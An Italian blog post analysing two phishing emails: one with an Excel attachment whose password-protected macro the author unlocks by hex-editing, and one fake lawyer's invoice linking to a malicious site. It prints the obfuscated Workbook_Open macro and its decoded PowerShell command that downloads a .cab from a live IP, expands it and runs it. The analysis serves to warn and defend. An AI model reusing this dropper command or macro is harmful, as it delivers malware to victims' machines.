Oggi ho ricevuto diverse e-mail con un finto messaggio di conferma di una spedizione. Allegato alla e-mail c’era anche un file Excel con nome GC3609_711.xls  o con varianti simili sempre con le iniziali GC. Aprendo copio il file in una macchina virtuale e tento di aprire il file. Naturalmente c’è una macro che tenta di partire. Ma per fortuna le versioni recenti di Excel hanno per impostazione predefinita le macro disabilitate, ok. Apro l’editor delle macro, ovviamente la macro è protetta da password. Per sbloccare la password della macro VBA:

  1. aprire il file Excel con un editor esadecimale, tipo Notepad++;
  2. cercare la stringa DPB e cambiarla con DPx
  3. aprire di nuovo il file, aprire l’editor delle macro, andrà in errore non importa, impostare una nuova password a piacere;
  4. chiudere di nuovo il file e riaprilo, immettere la password per sbloccare la macro;

A questo punto il file è aperto per l’ispezione. Ovviamente c’è un evento all’apertura del file:

Sub Workbook_Open()
vgfhGGGgfhhdfh
End Sub

la funzione vgfhGGGgfhhdfh è:

Sub vgfhGGGgfhhdfh()

kggTUI6FREGfdg = esardhHvsmEBZuSZUhk(“c^m_d\ e/HKU cPƒoSwQepr]SbhRe‚lVl-.)ejxTe| i(WNre†we-dOKbLj€e-cEt{ =SyyCset}efma.UNxest:.W0e;b4CJlkime2n5tG)t.PD$oCwn)lNo^aJd†F}i~l{e…(h’Zhht?trpV:u/|/‚1r3>4u.M1.9&.t178%0w..4A4„/„sksQd…yLnda€m\o~ocsjs8/…s€sup4i.dZa„rOs[sS.jcpa(bQ’T,f’y%oTDEbM†PI%n\cFOg(d9g:F7F@F$gzf$g^Fw.vc1a8b=’-)];z leNx+p/aWn*d3 M%aT%E?M’Pp%A\lFig;d|g9F‚F&FXg’f<g0FT.Ncza@bo `%XToE+MHPq%Y\lF5g+ddggFBFiFsgƒfngGFY.ZeVx`e);6 Ds~t3a1rPtW ]%MT}E6M(Pm%J\OFvgIdRgmFfFEF_g,f,g`Fq.%e[xeY;#”)
Shell kggTUI6FREGfdg, vbNormalFocus
End Sub

la funzione esardhHvsmEBZuSZUhk contiene un sacco di fuffa, ma il fulcro è un ciclo for con step 2 che prende semplicemente un carattere si e un carattere no della stringa in input, è costruisce il comando:

“cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile(‘http://134.19.180.44/ssdynamooss/sspidarss.cab’,’%TEMP%\FgdgFFFgfgF.cab’); expand %TEMP%\FgdgFFFgfgF.cab %TEMP%\FgdgFFFgfgF.exe; start %TEMP%\FgdgFFFgfgF.exe;”

In pratica viene avviata una shell DOS che a sua volta utilizza la PowerShell per scaricare un file da un indirizzo predeterminato. Poi il file viene espanso in un exe e avviato.

Bel tentativo.

 

 

Ho ricevuto questa simpatica e-mail:

Gentile Cliente,
Da un nostro controllo contabile non ci risulta a tutt’oggi il pagamento della fattura P.N. 335624-1 dell’importo di Euro 4.329,50.
Se la fattura risulta gia saldata o se ritiene possa sussistere un errore cotabile la invito a prendere visione del conto da pagare attraverso il nostro:
www.avvocati-ass.com/Fatturazione_CEF/FTR-335624.html ( clicca per collegarti )
In difetto, provvederò ad agire nelle sedi opportune, senza ulteriore preavviso.

Distinti saluti.
Dott.Avv. Giancarlo Gentiloni

Inutile dire che andando sul sito viene tentata l’installazione di una componente aggiuntiva di IE, che tenta di fare chissà cosa. Anche se si clicca sul tasto ingrandisci viene scaricato un eseguibile che tenta di fare la stesa cosa. I dati di registrazione del sito non sono accessibili, ma il componente di IE e l’eseguibile sono firmati con un certificato emesso a favore di:

CN = GENUINE SOFTWARE UPDATE LIMITED
OU = Sviluppo sicuro dell’applicazione
O = GENUINE SOFTWARE UPDATE LIMITED
L = LONDON
S = LONODN
C = UK

Da notare la seconda riga. Una società con nome simile è registrata effettivamente a 7 RAVENET STREET LONDON SW11 5HE. Se provate ad aprire il programma verranno modificati i preferiti di IE e la home page. Se si apre IE si viene dirottati sul sito katasearch.com (un falso motore di ricerca fonte di virus) che tenta di installare un trojan, il Win32:Agent:PFK[Trj].

Mi raccomando non cliccate in nessun modo sul link nell’e-mail, e come ogni e-mail di spam non dovete mai rispondere. Infatti la risposta non fa altro che confermare, allo spammer, il vostro indirizzo di posta, in modo da poter essere soggetti allo spam anche in seguito.